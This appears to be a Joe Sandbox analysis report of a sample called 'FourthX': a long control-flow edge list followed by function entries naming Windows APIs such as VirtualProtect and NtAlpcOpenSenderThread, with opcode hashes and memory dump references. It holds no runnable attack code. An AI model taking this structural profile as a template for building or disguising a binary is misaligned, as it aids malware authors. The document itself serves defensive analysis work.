7ff69a531394 2 API calls 4055->4057 4058 7ff69a531394 2 API calls 4056->4058 4057->4056 4059 7ff69a531567 4058->4059 4060 7ff69a53156c 4059->4060 4061 7ff69a531394 2 API calls 4059->4061 4062 7ff69a531394 2 API calls 4060->4062 4061->4060 4063 7ff69a531576 4062->4063 4064 7ff69a53157b 4063->4064 4065 7ff69a531394 2 API calls 4063->4065 4066 7ff69a531394 2 API calls 4064->4066 4065->4064 4067 7ff69a531585 4066->4067 4068 7ff69a53158a 4067->4068 4069 7ff69a531394 2 API calls 4067->4069 4070 7ff69a531394 2 API calls 4068->4070 4069->4068 4071 7ff69a531599 4070->4071 4072 7ff69a531394 2 API calls 4071->4072 4073 7ff69a5315a3 4072->4073 4074 7ff69a5315a8 4073->4074 4075 7ff69a531394 2 API calls 4073->4075 4076 7ff69a531394 2 API calls 4074->4076 4075->4074 4077 7ff69a5315b7 4076->4077 4078 7ff69a531394 2 API calls 4077->4078 4079 7ff69a5315c1 4078->4079 4080 7ff69a531394 2 API calls 4079->4080 4081 7ff69a5315c6 4080->4081 4082 7ff69a531394 2 API calls 4081->4082 4083 7ff69a5315d5 4082->4083 4084 7ff69a531394 2 API calls 4083->4084 4085 7ff69a5315e4 4084->4085 4086 7ff69a531394 2 API calls 4085->4086 4087 7ff69a5315f3 4086->4087 4087->3685 4089 7ff69a531394 2 API calls 4088->4089 4090 7ff69a53143b 4089->4090 4091 7ff69a531440 4090->4091 4092 7ff69a531394 2 API calls 4090->4092 4093 7ff69a531394 2 API calls 4091->4093 4092->4091 4094 7ff69a53144f 4093->4094 4095 7ff69a531394 2 API calls 4094->4095 4096 7ff69a531459 4095->4096 4097 7ff69a53145e 4096->4097 4098 7ff69a531394 2 API calls 4096->4098 4099 7ff69a531394 2 API calls 4097->4099 4098->4097 4100 7ff69a531468 4099->4100 4101 7ff69a53146d 4100->4101 4102 7ff69a531394 2 API calls 4100->4102 4103 7ff69a531394 2 API calls 4101->4103 4102->4101 4104 7ff69a531477 4103->4104 4105 7ff69a53147c 4104->4105 4106 7ff69a531394 2 API calls 4104->4106 4107 7ff69a531394 2 API calls 4105->4107 4106->4105 4108 7ff69a531486 4107->4108 4109 7ff69a53148b 4108->4109 4110 7ff69a531394 2 API calls 4108->4110 4111 7ff69a531394 2 API calls 4109->4111 4110->4109 4112 7ff69a531495 4111->4112 4113 7ff69a53149a 4112->4113 4114 7ff69a531394 2 API calls 4112->4114 4115 7ff69a531394 2 API calls 4113->4115 4114->4113 4116 7ff69a5314a4 4115->4116 4117 7ff69a5314a9 4116->4117 4118 7ff69a531394 2 API calls 4116->4118 4119 7ff69a531394 2 API calls 4117->4119 4118->4117 4120 7ff69a5314b3 4119->4120 4121 7ff69a531394 2 API calls 4120->4121 4122 7ff69a5314b8 4121->4122 4123 7ff69a531394 2 API calls 4122->4123 4124 7ff69a5314c7 4123->4124 4125 7ff69a531394 2 API calls 4124->4125 4126 7ff69a5314d6 4125->4126 4127 7ff69a531394 2 API calls 4126->4127 4128 7ff69a5314e5 4127->4128 4129 7ff69a531394 2 API calls 4128->4129 4130 7ff69a5314f4 4129->4130 4131 7ff69a531394 2 API calls 4130->4131 4132 7ff69a531503 4131->4132 4133 7ff69a531394 2 API calls 4132->4133 4134 7ff69a531512 4133->4134 4135 7ff69a531394 2 API calls 4134->4135 4136 7ff69a531521 4135->4136 4137 7ff69a531530 4136->4137 4138 7ff69a531394 2 API calls 4136->4138 4139 7ff69a531394 2 API calls 4137->4139 4138->4137 4140 7ff69a53153a 4139->4140 4141 7ff69a53153f 4140->4141 4142 7ff69a531394 2 API calls 4140->4142 4143 7ff69a531394 2 API calls 4141->4143 4142->4141 4144 7ff69a53154e 4143->4144 4145 7ff69a531394 2 API calls 4144->4145 4146 7ff69a531558 4145->4146 4147 7ff69a53155d 4146->4147 4148 7ff69a531394 2 API calls 4146->4148 4149 7ff69a531394 2 API calls 4147->4149 4148->4147 4150 7ff69a531567 4149->4150 4151 7ff69a53156c 4150->4151 4152 7ff69a531394 2 API calls 4150->4152 4153 7ff69a531394 2 API calls 4151->4153 4152->4151 4154 7ff69a531576 4153->4154 4155 7ff69a53157b 4154->4155 4156 7ff69a531394 2 API calls 4154->4156 4157 7ff69a531394 2 API calls 4155->4157 4156->4155 4158 7ff69a531585 4157->4158 4159 7ff69a53158a 4158->4159 4160 7ff69a531394 2 API calls 4158->4160 4161 7ff69a531394 2 API calls 4159->4161 4160->4159 4162 7ff69a531599 4161->4162 4163 7ff69a531394 2 API calls 4162->4163 4164 7ff69a5315a3 4163->4164 4165 7ff69a5315a8 4164->4165 4166 7ff69a531394 2 API calls 4164->4166 4167 7ff69a531394 2 API calls 4165->4167 4166->4165 4168 7ff69a5315b7 4167->4168 4169 7ff69a531394 2 API calls 4168->4169 4170 7ff69a5315c1 4169->4170 4171 7ff69a531394 2 API calls 4170->4171 4172 7ff69a5315c6 4171->4172 4173 7ff69a531394 2 API calls 4172->4173 4174 7ff69a5315d5 4173->4174 4175 7ff69a531394 2 API calls 4174->4175 4176 7ff69a5315e4 4175->4176 4177 7ff69a531394 2 API calls 4176->4177 4178 7ff69a5315f3 4177->4178 4178->3688 4180 7ff69a531394 2 API calls 4179->4180 4181 7ff69a5314c7 4180->4181 4182 7ff69a531394 2 API calls 4181->4182 4183 7ff69a5314d6 4182->4183 4184 7ff69a531394 2 API calls 4183->4184 4185 7ff69a5314e5 4184->4185 4186 7ff69a531394 2 API calls 4185->4186 4187 7ff69a5314f4 4186->4187 4188 7ff69a531394 2 API calls 4187->4188 4189 7ff69a531503 4188->4189 4190 7ff69a531394 2 API calls 4189->4190 4191 7ff69a531512 4190->4191 4192 7ff69a531394 2 API calls 4191->4192 4193 7ff69a531521 4192->4193 4194 7ff69a531530 4193->4194 4195 7ff69a531394 2 API calls 4193->4195 4196 7ff69a531394 2 API calls 4194->4196 4195->4194 4197 7ff69a53153a 4196->4197 4198 7ff69a53153f 4197->4198 4199 7ff69a531394 2 API calls 4197->4199 4200 7ff69a531394 2 API calls 4198->4200 4199->4198 4201 7ff69a53154e 4200->4201 4202 7ff69a531394 2 API calls 4201->4202 4203 7ff69a531558 4202->4203 4204 7ff69a53155d 4203->4204 4205 7ff69a531394 2 API calls 4203->4205 4206 7ff69a531394 2 API calls 4204->4206 4205->4204 4207 7ff69a531567 4206->4207 4208 7ff69a53156c 4207->4208 4209 7ff69a531394 2 API calls 4207->4209 4210 7ff69a531394 2 API calls 4208->4210 4209->4208 4211 7ff69a531576 4210->4211 4212 7ff69a53157b 4211->4212 4213 7ff69a531394 2 API calls 4211->4213 4214 7ff69a531394 2 API calls 4212->4214 4213->4212 4215 7ff69a531585 4214->4215 4216 7ff69a53158a 4215->4216 4217 7ff69a531394 2 API calls 4215->4217 4218 7ff69a531394 2 API calls 4216->4218 4217->4216 4219 7ff69a531599 4218->4219 4220 7ff69a531394 2 API calls 4219->4220 4221 7ff69a5315a3 4220->4221 4222 7ff69a5315a8 4221->4222 4223 7ff69a531394 2 API calls 4221->4223 4224 7ff69a531394 2 API calls 4222->4224 4223->4222 4225 7ff69a5315b7 4224->4225 4226 7ff69a531394 2 API calls 4225->4226 4227 7ff69a5315c1 4226->4227 4228 7ff69a531394 2 API calls 4227->4228 4229 7ff69a5315c6 4228->4229 4230 7ff69a531394 2 API calls 4229->4230 4231 7ff69a5315d5 4230->4231 4232 7ff69a531394 2 API calls 4231->4232 4233 7ff69a5315e4 4232->4233 4234 7ff69a531394 2 API calls 4233->4234 4235 7ff69a5315f3 4234->4235 4235->3761 4237 7ff69a531394 2 API calls 4236->4237 4238 7ff69a5315e4 4237->4238 4239 7ff69a531394 2 API calls 4238->4239 4240 7ff69a5315f3 4239->4240 4240->3761 4242 7ff69a531394 2 API calls 4241->4242 4243 7ff69a531495 4242->4243 4244 7ff69a53149a 4243->4244 4245 7ff69a531394 2 API calls 4243->4245 4246 7ff69a531394 2 API calls 4244->4246 4245->4244 4247 7ff69a5314a4 4246->4247 4248 7ff69a5314a9 4247->4248 4249 7ff69a531394 2 API calls 4247->4249 4250 7ff69a531394 2 API calls 4248->4250 4249->4248 4251 7ff69a5314b3 4250->4251 4252 7ff69a531394 2 API calls 4251->4252 4253 7ff69a5314b8 4252->4253 4254 7ff69a531394 2 API calls 4253->4254 4255 7ff69a5314c7 4254->4255 4256 7ff69a531394 2 API calls 4255->4256 4257 7ff69a5314d6 4256->4257 4258 7ff69a531394 2 API calls 4257->4258 4259 7ff69a5314e5 4258->4259 4260 7ff69a531394 2 API calls 4259->4260 4261 7ff69a5314f4 4260->4261 4262 7ff69a531394 2 API calls 4261->4262 4263 7ff69a531503 4262->4263 4264 7ff69a531394 2 API calls 4263->4264 4265 7ff69a531512 4264->4265 4266 7ff69a531394 2 API calls 4265->4266 4267 7ff69a531521 4266->4267 4268 7ff69a531530 4267->4268 4269 7ff69a531394 2 API calls 4267->4269 4270 7ff69a531394 2 API calls 4268->4270 4269->4268 4271 7ff69a53153a 4270->4271 4272 7ff69a53153f 4271->4272 4273 7ff69a531394 2 API calls 4271->4273 4274 7ff69a531394 2 API calls 4272->4274 4273->4272 4275 7ff69a53154e 4274->4275 4276 7ff69a531394 2 API calls 4275->4276 4277 7ff69a531558 4276->4277 4278 7ff69a53155d 4277->4278 4279 7ff69a531394 2 API calls 4277->4279 4280 7ff69a531394 2 API calls 4278->4280 4279->4278 4281 7ff69a531567 4280->4281 4282 7ff69a53156c 4281->4282 4283 7ff69a531394 2 API calls 4281->4283 4284 7ff69a531394 2 API calls 4282->4284 4283->4282 4285 7ff69a531576 4284->4285 4286 7ff69a53157b 4285->4286 4287 7ff69a531394 2 API calls 4285->4287 4288 7ff69a531394 2 API calls 4286->4288 4287->4286 4289 7ff69a531585 4288->4289 4290 7ff69a53158a 4289->4290 4291 7ff69a531394 2 API calls 4289->4291 4292 7ff69a531394 2 API calls 4290->4292 4291->4290 4293 7ff69a531599 4292->4293 4294 7ff69a531394 2 API calls 4293->4294 4295 7ff69a5315a3 4294->4295 4296 7ff69a5315a8 4295->4296 4297 7ff69a531394 2 API calls 4295->4297 4298 7ff69a531394 2 API calls 4296->4298 4297->4296 4299 7ff69a5315b7 4298->4299 4300 7ff69a531394 2 API calls 4299->4300 4301 7ff69a5315c1 4300->4301 4302 7ff69a531394 2 API calls 4301->4302 4303 7ff69a5315c6 4302->4303 4304 7ff69a531394 2 API calls 4303->4304 4305 7ff69a5315d5 4304->4305 4306 7ff69a531394 2 API calls 4305->4306 4307 7ff69a5315e4 4306->4307 4308 7ff69a531394 2 API calls 4307->4308 4309 7ff69a5315f3 4308->4309 4309->3754 4310 7ff69a53149a 4309->4310 4311 7ff69a531394 2 API calls 4310->4311 4312 7ff69a5314a4 4311->4312 4313 7ff69a5314a9 4312->4313 4314 7ff69a531394 2 API calls 4312->4314 4315 7ff69a531394 2 API calls 4313->4315 4314->4313 4316 7ff69a5314b3 4315->4316 4317 7ff69a531394 2 API calls 4316->4317 4318 7ff69a5314b8 4317->4318 4319 7ff69a531394 2 API calls 4318->4319 4320 7ff69a5314c7 4319->4320 4321 7ff69a531394 2 API calls 4320->4321 4322 7ff69a5314d6 4321->4322 4323 7ff69a531394 2 API calls 4322->4323 4324 7ff69a5314e5 4323->4324 4325 7ff69a531394 2 API calls 4324->4325 4326 7ff69a5314f4 4325->4326 4327 7ff69a531394 2 API calls 4326->4327 4328 7ff69a531503 4327->4328 4329 7ff69a531394 2 API calls 4328->4329 4330 7ff69a531512 4329->4330 4331 7ff69a531394 2 API calls 4330->4331 4332 7ff69a531521 4331->4332 4333 7ff69a531530 4332->4333 4334 7ff69a531394 2 API calls 4332->4334 4335 7ff69a531394 2 API calls 4333->4335 4334->4333 4336 7ff69a53153a 4335->4336 4337 7ff69a53153f 4336->4337 4338 7ff69a531394 2 API calls 4336->4338 4339 7ff69a531394 2 API calls 4337->4339 4338->4337 4340 7ff69a53154e 4339->4340 4341 7ff69a531394 2 API calls 4340->4341 4342 7ff69a531558 4341->4342 4343 7ff69a53155d 4342->4343 4344 7ff69a531394 2 API calls 4342->4344 4345 7ff69a531394 2 API calls 4343->4345 4344->4343 4346 7ff69a531567 4345->4346 4347 7ff69a53156c 4346->4347 4348 7ff69a531394 2 API calls 4346->4348 4349 7ff69a531394 2 API calls 4347->4349 4348->4347 4350 7ff69a531576 4349->4350 4351 7ff69a53157b 4350->4351 4352 7ff69a531394 2 API calls 4350->4352 4353 7ff69a531394 2 API calls 4351->4353 4352->4351 4354 7ff69a531585 4353->4354 4355 7ff69a53158a 4354->4355 4356 7ff69a531394 2 API calls 4354->4356 4357 7ff69a531394 2 API calls 4355->4357 4356->4355 4358 7ff69a531599 4357->4358 4359 7ff69a531394 2 API calls 4358->4359 4360 7ff69a5315a3 4359->4360 4361 7ff69a5315a8 4360->4361 4362 7ff69a531394 2 API calls 4360->4362 4363 7ff69a531394 2 API calls 4361->4363 4362->4361 4364 7ff69a5315b7 4363->4364 4365 7ff69a531394 2 API calls 4364->4365 4366 7ff69a5315c1 4365->4366 4367 7ff69a531394 2 API calls 4366->4367 4368 7ff69a5315c6 4367->4368 4369 7ff69a531394 2 API calls 4368->4369 4370 7ff69a5315d5 4369->4370 4371 7ff69a531394 2 API calls 4370->4371 4372 7ff69a5315e4 4371->4372 4373 7ff69a531394 2 API calls 4372->4373 4374 7ff69a5315f3 4373->4374 4374->3754 4374->3765 4376 7ff69a531394 2 API calls 4375->4376 4377 7ff69a531486 4376->4377 4378 7ff69a53148b 4377->4378 4379 7ff69a531394 2 API calls 4377->4379 4380 7ff69a531394 2 API calls 4378->4380 4379->4378 4381 7ff69a531495 4380->4381 4382 7ff69a53149a 4381->4382 4383 7ff69a531394 2 API calls 4381->4383 4384 7ff69a531394 2 API calls 4382->4384 4383->4382 4385 7ff69a5314a4 4384->4385 4386 7ff69a5314a9 4385->4386 4387 7ff69a531394 2 API calls 4385->4387 4388 7ff69a531394 2 API calls 4386->4388 4387->4386 4389 7ff69a5314b3 4388->4389 4390 7ff69a531394 2 API calls 4389->4390 4391 7ff69a5314b8 4390->4391 4392 7ff69a531394 2 API calls 4391->4392 4393 7ff69a5314c7 4392->4393 4394 7ff69a531394 2 API calls 4393->4394 4395 7ff69a5314d6 4394->4395 4396 7ff69a531394 2 API calls 4395->4396 4397 7ff69a5314e5 4396->4397 4398 7ff69a531394 2 API calls 4397->4398 4399 7ff69a5314f4 4398->4399 4400 7ff69a531394 2 API calls 4399->4400 4401 7ff69a531503 4400->4401 4402 7ff69a531394 2 API calls 4401->4402 4403 7ff69a531512 4402->4403 4404 7ff69a531394 2 API calls 4403->4404 4405 7ff69a531521 4404->4405 4406 7ff69a531530 4405->4406 4407 7ff69a531394 2 API calls 4405->4407 4408 7ff69a531394 2 API calls 4406->4408 4407->4406 4409 7ff69a53153a 4408->4409 4410 7ff69a53153f 4409->4410 4411 7ff69a531394 2 API calls 4409->4411 4412 7ff69a531394 2 API calls 4410->4412 4411->4410 4413 7ff69a53154e 4412->4413 4414 7ff69a531394 2 API calls 4413->4414 4415 7ff69a531558 4414->4415 4416 7ff69a53155d 4415->4416 4417 7ff69a531394 2 API calls 4415->4417 4418 7ff69a531394 2 API calls 4416->4418 4417->4416 4419 7ff69a531567 4418->4419 4420 7ff69a53156c 4419->4420 4421 7ff69a531394 2 API calls 4419->4421 4422 7ff69a531394 2 API calls 4420->4422 4421->4420 4423 7ff69a531576 4422->4423 4424 7ff69a53157b 4423->4424 4425 7ff69a531394 2 API calls 4423->4425 4426 7ff69a531394 2 API calls 4424->4426 4425->4424 4427 7ff69a531585 4426->4427 4428 7ff69a53158a 4427->4428 4429 7ff69a531394 2 API calls 4427->4429 4430 7ff69a531394 2 API calls 4428->4430 4429->4428 4431 7ff69a531599 4430->4431 4432 7ff69a531394 2 API calls 4431->4432 4433 7ff69a5315a3 4432->4433 4434 7ff69a5315a8 4433->4434 4435 7ff69a531394 2 API calls 4433->4435 4436 7ff69a531394 2 API calls 4434->4436 4435->4434 4437 7ff69a5315b7 4436->4437 4438 7ff69a531394 2 API calls 4437->4438 4439 7ff69a5315c1 4438->4439 4440 7ff69a531394 2 API calls 4439->4440 4441 7ff69a5315c6 4440->4441 4442 7ff69a531394 2 API calls 4441->4442 4443 7ff69a5315d5 4442->4443 4444 7ff69a531394 2 API calls 4443->4444 4445 7ff69a5315e4 4444->4445 4446 7ff69a531394 2 API calls 4445->4446 4447 7ff69a5315f3 4446->4447 4447->3770 4449 7ff69a531394 2 API calls 4448->4449 4450 7ff69a5315d5 4449->4450 4451 7ff69a531394 2 API calls 4450->4451 4452 7ff69a5315e4 4451->4452 4453 7ff69a531394 2 API calls 4452->4453 4454 7ff69a5315f3 4453->4454 4454->3771 4459 7ff69a532320 strlen 4460 7ff69a532337 4459->4460 4475 7ff69a531000 4476 7ff69a53108b __set_app_type 4475->4476 4477 7ff69a531040 4475->4477 4478 7ff69a5310b6 4476->4478 4477->4476 4479 7ff69a5310e5 4478->4479 4481 7ff69a531e00 4478->4481 4482 7ff69a537cf0 __setusermatherr 4481->4482 4483 7ff69a531800 4484 7ff69a531812 4483->4484 4485 7ff69a531835 fprintf 4484->4485 4461 7ff69a53219e 4462 7ff69a5321ab EnterCriticalSection 4461->4462 4463 7ff69a532272 4461->4463 4464 7ff69a5321c8 4462->4464 4465 7ff69a532265 LeaveCriticalSection 4462->4465 4464->4465 4466 7ff69a5321e9 TlsGetValue GetLastError 4464->4466 4465->4463 4466->4464 4486 7ff69a532104 4487 7ff69a532111 EnterCriticalSection 4486->4487 4489 7ff69a532218 4486->4489 4490 7ff69a53220b LeaveCriticalSection 4487->4490 4494 7ff69a53212e 4487->4494 4488 7ff69a532272 4489->4488 4491 7ff69a532241 DeleteCriticalSection 4489->4491 4493 7ff69a532230 free 4489->4493 4490->4489 4491->4488 4492 7ff69a53214d TlsGetValue GetLastError 4492->4494 4493->4491 4493->4493 4494->4490 4494->4492 4512 7ff69a531e65 4513 7ff69a531e67 signal 4512->4513 4514 7ff69a531e7c 4513->4514 4515 7ff69a531e99 4513->4515 4514->4515 4516 7ff69a531e82 signal 4514->4516 4516->4515 4528 7ff69a531ac3 4529 7ff69a531a70 4528->4529 4530 7ff69a531b36 4529->4530 4531 7ff69a53199e 4529->4531 4534 7ff69a531b53 4529->4534 4532 7ff69a531ba0 4 API calls 4530->4532 4533 7ff69a531a0f 4531->4533 4535 7ff69a5319e9 VirtualProtect 4531->4535 4532->4534 4535->4531 4536 7ff69a531f47 4537 7ff69a531e67 signal 4536->4537 4538 7ff69a531e99 4536->4538 4537->4538 4539 7ff69a531e7c 4537->4539 4539->4538 4540 7ff69a531e82 signal 4539->4540 4540->4538 4495 7ff69a531e10 4496 7ff69a531e2f 4495->4496 4497 7ff69a531eb5 4496->4497 4498 7ff69a531ecc 4496->4498 4501 7ff69a531e55 4496->4501 4498->4497 4499 7ff69a531ed3 signal 4498->4499 4499->4497 4500 7ff69a531ee4 4499->4500 4500->4497 4502 7ff69a531eea signal 4500->4502 4501->4497 4503 7ff69a531f12 signal 4501->4503 4502->4497 4503->4497 4517 7ff69a531a70 4518 7ff69a531a7d 4517->4518 4519 7ff69a53199e 4517->4519 4518->4517 4521 7ff69a531b53 4518->4521 4523 7ff69a531b36 4518->4523 4520 7ff69a531a0f 4519->4520 4522 7ff69a5319e9 VirtualProtect 4519->4522 4522->4519 4524 7ff69a531ba0 4 API calls 4523->4524 4524->4521 4541 7ff69a532050 4542 7ff69a53205e EnterCriticalSection 4541->4542 4543 7ff69a5320cf 4541->4543 4544 7ff69a5320c2 LeaveCriticalSection 4542->4544 4545 7ff69a532079 4542->4545 4544->4543 4545->4544 4546 7ff69a5320bd free 4545->4546 4546->4544 4547 7ff69a531fd0 4548 7ff69a531fe4 4547->4548 4550 7ff69a532033 4547->4550 4549 7ff69a531ffd EnterCriticalSection LeaveCriticalSection 4548->4549 4548->4550 4549->4550 4525 7ff69a53216f 4526 7ff69a532178 InitializeCriticalSection 4525->4526 4527 7ff69a532185 4525->4527 4526->4527 4455 7ff69a531394 4456 7ff69a537760 malloc 4455->4456 4457 7ff69a5313b8 4456->4457 4458 7ff69a5313c6 NtAlpcOpenSenderThread 4457->4458 4467 7ff69a531ab3 4468 7ff69a531a70 4467->4468 4468->4467 4469 7ff69a531b36 4468->4469 4470 7ff69a53199e 4468->4470 4474 7ff69a531b53 4468->4474 4471 7ff69a531ba0 4 API calls 4469->4471 4472 7ff69a531a0f 4470->4472 4473 7ff69a5319e9 VirtualProtect 4470->4473 4471->4474 4473->4470

                                                                                            Executed Functions

                                                                                            Function 00007FF69A531160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            • Associated: 00000004.00000002.1436783304.00007FF69A530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436826482.00007FF69A538000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436844817.00007FF69A53A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436862676.00007FF69A53B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437120032.00007FF69A7B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437185303.00007FF69A7B9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437225245.00007FF69A7BC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ff69a530000_FourthX.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2643109117-0
                                                                                            • Opcode ID: 2b53ccf195520873a2e917af6671c9f2e66b4ccc906881f89422d3245024f0a5
                                                                                            • Instruction ID: 27bce8ce139899e3fbcfb9e7a52058f18e861de07bc588bd195729ec89287832
                                                                                            • Opcode Fuzzy Hash: 2b53ccf195520873a2e917af6671c9f2e66b4ccc906881f89422d3245024f0a5
                                                                                            • Instruction Fuzzy Hash: 5F512665F09646C1FA309B26E9913B937E0FFCA780F4095F1DA8DC73A6DE2CA4958310
                                                                                            Function 00007FF69A531394 Relevance: 1.5, APIs: 1, Instructions: 24nativethreadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • NtAlpcOpenSenderThread.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69A531156), ref: 00007FF69A5313F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            • Associated: 00000004.00000002.1436783304.00007FF69A530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436826482.00007FF69A538000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436844817.00007FF69A53A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436862676.00007FF69A53B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437120032.00007FF69A7B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437185303.00007FF69A7B9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437225245.00007FF69A7BC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ff69a530000_FourthX.jbxd
                                                                                            Similarity
                                                                                            • API ID: AlpcOpenSenderThread
                                                                                            • String ID:
                                                                                            • API String ID: 2815344548-0
                                                                                            • Opcode ID: 12f7f34e5646d7a47c6394ab71dba81ff32d213577a609a8212d1207fc3fc457
                                                                                            • Instruction ID: 66b6a56c93f3288bf36e84f578cfcee90f744e511c8f4ef10120472394a9de03
                                                                                            • Opcode Fuzzy Hash: 12f7f34e5646d7a47c6394ab71dba81ff32d213577a609a8212d1207fc3fc457
                                                                                            • Instruction Fuzzy Hash: 60F07975A08B41CAD620EF51F95156A77A1FB9A780B0058B5EACC83725EF3EE1508B40

                                                                                            Non-executed Functions

                                                                                            Function 00007FF69A533350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            • Associated: 00000004.00000002.1436783304.00007FF69A530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436826482.00007FF69A538000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436844817.00007FF69A53A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436862676.00007FF69A53B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437120032.00007FF69A7B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437185303.00007FF69A7B9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437225245.00007FF69A7BC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ff69a530000_FourthX.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscatwcscpywcslen
                                                                                            • String ID: $0$0$@$@
                                                                                            • API String ID: 4263182637-1413854666
                                                                                            • Opcode ID: c0374e99f57159db9168dd41bd58a6aa1b632868761db697d436deb027a0c17b
                                                                                            • Instruction ID: f24beb74553e7515e0b511090bdbb5391b16c554aff283be0b115e1980f3d171
                                                                                            • Opcode Fuzzy Hash: c0374e99f57159db9168dd41bd58a6aa1b632868761db697d436deb027a0c17b
                                                                                            • Instruction Fuzzy Hash: 48B17C61A0CAC695E331CF28E4163BA77E0FFD5348F4012B5EAC8966A5DF7CE1858B44
                                                                                            Function 00007FF69A532690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            • Associated: 00000004.00000002.1436783304.00007FF69A530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436826482.00007FF69A538000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436844817.00007FF69A53A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1436862676.00007FF69A53B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437120032.00007FF69A7B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437185303.00007FF69A7B9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000004.00000002.1437225245.00007FF69A7BC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ff69a530000_FourthX.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                                            • String ID: 0$X$`
                                                                                            • API String ID: 329590056-2527496196
                                                                                            • Opcode ID: 048c2398568d0800d11cdb0fb5f1a267ba7517e309314ff7a549fe036a4ef88d
                                                                                            • Instruction ID: 48eb1ef39b9561a82ac5daa5da909e00144c3faea41d84117eb8c95f729af973
                                                                                            • Opcode Fuzzy Hash: 048c2398568d0800d11cdb0fb5f1a267ba7517e309314ff7a549fe036a4ef88d
                                                                                            • Instruction Fuzzy Hash: 59028862A09BC691E7708F19E8013AA77A0FB967A4F4043B5DADC877A5DF3CD185C700
                                                                                            Function 00007FF69A531BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • VirtualQuery.KERNEL32(?,?,?,?,00007FF69A5393AC,00007FF69A5393AC,?,?,00007FF69A530000,?,00007FF69A531991), ref: 00007FF69A531C63
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,00007FF69A5393AC,00007FF69A5393AC,?,?,00007FF69A530000,?,00007FF69A531991), ref: 00007FF69A531CC7
                                                                                            • memcpy.MSVCRT ref: 00007FF69A531CE0
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00007FF69A5393AC,00007FF69A5393AC,?,?,00007FF69A530000,?,00007FF69A531991), ref: 00007FF69A531D23
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
